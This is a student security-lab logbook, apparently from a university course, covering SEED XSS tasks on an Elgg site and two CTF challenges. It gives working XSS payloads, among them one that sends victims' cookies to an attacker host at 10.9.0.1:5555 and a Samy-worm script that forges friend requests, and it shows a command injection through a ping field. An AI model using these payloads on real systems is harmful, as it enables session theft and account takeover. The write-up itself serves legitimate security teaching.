# LOGBOOK 10 Tarefas #1 a #4 ## Task #1 To embed a javascript profile in our profile, in the editing page we typed `<script>alert('XSS');</script>` in the brief description area. ![](https://i.imgur.com/FWACGlw.png) Now when we view our profile, the script is executed and we see an alert with `XSS`. ![](https://i.imgur.com/VynyhR9.png) ## Task #2 In order to display a user's cookies, we typed the following script on our brief description section in the profile: `<script>alert(document.cookie);</script>` ![](https://i.imgur.com/wZUOGra.png) Now, when someone visits our profile, their cookies will be displayed. ![](https://i.imgur.com/wIClRFh.png) ## Task #3 In order to steal a victims cookies, we added the following scipt to our profile: `<script>document.write('<img src=http://10.9.0.1:5555?c=' + escape(document.cookie) + ' >'); </script>`. ![](https://i.imgur.com/QVyZuE2.png) Now, when someone visits our profile, their browser will send a HTTP GET request to our (the attacker's) computer, with the IP 10.9.0.1 and port 5555, to get an image, but instead will send the victims cookies in the request. To view this request, and the cookies, we ran netcat, with the command `nc -lknv 5555`, to listen to incomming connections, and when someone visits our profile we get: ```GET GET /?c=system%3DPW%3B%20caf_ipaddr%3D193.136.33.109%3B%20country%3DPT%3B%20city%3D%22Porto%22%3B%20traffic_target%3Dgd%3B%20__gsas%3DID%3Df6512463016314d4%3AT%3D1669367385%3AS%3DALNI_MZeOvQ-ZAxy0yoBfMplqFLoiuOObw%3B%20pvisitor%3Df8dd5976-1048-4fe6-961b-2e81b42f3156%3B%20Elgg%3D8plf8p08fmoguchv83gidopggi%3B%20elggperm%3Dz1RDjHcJwufS3wbA5j1n1v9HyO8E8l2d HTTP/1.1 Host: 10.9.0.1:5555 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: image/webp,*/* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://www.seed-server.com/profile/boby ``` ![](https://i.imgur.com/yufad7Y.png) ## Task #4 To replicate the Samy Worm, we needed to discover what is the HTTP GET request sent by the browser to add someone as a friend. For this, we logged in as a Alice and added Samy as Friend manually. Using Firefox's HTTP Header Live extension we captured the following request: ![](https://i.imgur.com/t5FGXxj.png) We can see that the request was sent to the url: `http://www.seed-server.com/action/friends/add?friend=59&__elgg_ts=1669370236&__elgg_token=wQdylCWnRXXtVSRRdTvSqg&__elgg_ts=1669370236&__elgg_token=wQdylCWnRXXtVSRRdTvSqg` or `'http://www.seed-server.com/action/friends/add?friend=' + friendId + ts + token` where: `friendId = 59` -> As we can see in the HTTP GET request, Samy's Id is 59. `ts = '&__elgg_ts=' + elgg.security.token.__elgg_ts` -> The parameter's name plus the user's timestamp token. `token = '&__elgg_token=' + elgg.security.token.__elgg_token` -> The parameter's name plus the user's security token. So our script should look like this: ```javascript <script type="text/javascript"> window.onload = function () { var Ajax=null; var ts="&__elgg_ts="+elgg.security.token.__elgg_ts; var token="&__elgg_token="+elgg.security.token.__elgg_token; //Construct the HTTP request to add Samy as a friend. var sendurl='http://www.seed-server.com/action/friends/add?friend=59' + ts + token ; //Create and send Ajax request to add friend Ajax=new XMLHttpRequest(); Ajax.open("GET", sendurl, true); Ajax.send(); } </script> ``` So, to see if the script works we then remove Samy from Alice's friends, login as Samy and add the script on his profile, in the About Me section, in text mode. ![](https://i.imgur.com/ffK421H.png) Now, when we log back in as Alice. We can see here that Samy is not her friend: ![](https://i.imgur.com/g3pDguV.png) Then we go to Samy's profile, note that we do not click the 'Add Friend' button: ![](https://i.imgur.com/7zfRmLt.png) Finally, if we go to Alice's friend list again, we will see Samy there: ![](https://i.imgur.com/vEC0vZ7.png) Answering the questions: - Both lines are security tokens that are sended so that our request can be considered as a legitimate request by the website instead of a malicious one. This way we can bypass the security of the website. Line 1 is a ts token which means it sends the timestamp of the request and line 2 is the secret token that is compared to see if it is a request sent by a human. - Without the text mode, the attack would not be possible because the special characters used for the script would be changed and this way the code wouldn't be able to run. To overcome this, we can write the script on a file, host it somewhere on the internet and add the following script to the Brief Description Section: `<script type="text/javascript" src="http://www.example.com/myscripts.js"></script>` Where http://www.example.com/myscripts.js is the url where the malicious script is hosted. This way the page will fetch the script and add it to the page. # CTF Challenge 1 - In the website after making a request, our request seems to always be disapproved after the 2 mins pass away, but we notice that there is a button which allow us to edit the state of the request and give us the flag if we have some kind of admin privileges that allow us to enable those buttons state to be available to press it. ![](https://i.imgur.com/nC0MWg5.png) - We also notice that the input doesn't seem to have any type of verification which allow us to do a XSS. So we could add a sript to it that allow us to change the state of the buttons to get our request approved and get the flag. ![](https://i.imgur.com/GjdPcb4.png) - By inspetting the element we see that the button is disabled and that has id="giveflag", so we need to add a script to click on the button. ![](https://i.imgur.com/mqyym6n.png) - After enabling the button we notice we don't have admin priviliges so we need to make the admin to click on it for us. ![](https://i.imgur.com/p5QaDUM.png) ![](https://i.imgur.com/VXwJd1o.png) - So we did so by using this script which gave us the flag. ![](https://i.imgur.com/TLmu8Wc.png) ![](https://i.imgur.com/VgYNMSa.png) # CTF Challenge 2 - By observing the site we see that we have access to login forms and a button to check the network status. ![](https://i.imgur.com/7YbTXS8.png) - In the network status page we have access to a input form to ping the host and a button that show us the speed report with a silly gif. ![](https://i.imgur.com/jQ3v4zW.png) - We think that the ping system should be a vulnerability since it uses a linux utilitary to send packages to the host to verify if connection. That packages sent should not be verified by the input. After writing the host '0' it indeed sent us the packages information of that machine. ![](https://i.imgur.com/XnoHxz9.png) - Since our packets are sent between the machines without verification we could use this submit functionality to exploit it into giving us the /flags/flag.txt file in the host response. - Since it is a linux utilitary we can navigate through the system using ls an cd commands freely. ![](https://i.imgur.com/0EhDBOF.png) ![](https://i.imgur.com/nXSL1Wl.png) - By changing the current directory to outside the website code with `cd ..;` followed by `ls;` in the host system we got to the point we could see the flags folder. ![](https://i.imgur.com/33bkY0w.png) ![](https://i.imgur.com/2uZweRd.png) - So we could finally execute the command to print the flag. ![](https://i.imgur.com/Jh3qnil.png) ![](https://i.imgur.com/gxFFxcM.png)
Last changed by  
FSI l14g02
115

Read more

PFL_TP2_T08_Yoxii_4

Elementos: André Morais (50% contribuição) Lucas Sousa (50% contribuição) Instalação e Execução: Após instalar o SICTUS PROLOG é apenas preciso de consultar o ficheiro main.pl:consult('main.pl') e rodar o comando play. para poder começar a jogar. Descrição do jogo: Yoxii é um jogo que para ganhar devemos de circular o totem com as nossas peças mais fortes. O totem começa no centro do tabuleiro de jogo, que possui 37 quadrados e se assemelha a um retângulo sem cantos.

1/2/2023
LOGBOOK11

Task 1 In order to become a root CA we copied the openssl.cnf file to our directory, and edited it, created an empty index.txt file and a serial file with content 1000. We then used the following command to generate the ca.crt and ca.key: openssl req -x509 -newkey rsa:4096 -sha256 -days 3650 \ -keyout ca.key -out ca.crt \ -subj "/CN=www.modelCA.com/O=Model CA LTD./C=US" \ -passout pass:dees ca.crt:

12/22/2022
LOGBOOK 8

TASK 1: In this task, we interact with the MySQL database through a shell in the docker container. We login with mysql -u root -pdees, select the database Database changed and see the tables show tables;: We then use the SQL query SELECT * FROM credential WHERE name='alice'; to print Alice's information: | ID | Name | EID | Salary | birth | SSN | PhoneNumber | Address | Email | NickName | Password | | 1 | Alice | 10000 | 20000 | 9/20 | 10211002 ||||| fdbe918bdae83000aa54747fc95fe0470fff4976 | TASK 2.1 In order to login as an admin, we inject the the following username: admin'# or admin'--. Taking into account this query:

12/2/2022
LOGBOOK 6

TASK 1 In order to crash the program running in the docker container we send a message with the %s formatter. By doing echo %s the program will print the memory address in string format, but has the memory address can't be converted into a string the program crashes, as we can see because it didn't print: (^_^)(^_^) Returned properly (^_^)(^_^). TASK 2.A To discover how many %x we need for the server to print out our input we sent a mesage composed of @@@@ and many %x. We chose @@@@ because it's easy to recognize in hexadecimal as 40404040. We discovered our input in the 64th position of the server output. TASK 2.B In order to print out the secret message, we modified build_string.py to build our message. The message has the adress of the secret message, taking into account little-endian adresses, followed by 63 %x and a %s to print the message. In the server container we see that the secret message is A secret message. TASK 3.A

11/18/2022
Read more from FSI l14g02
Published on HackMD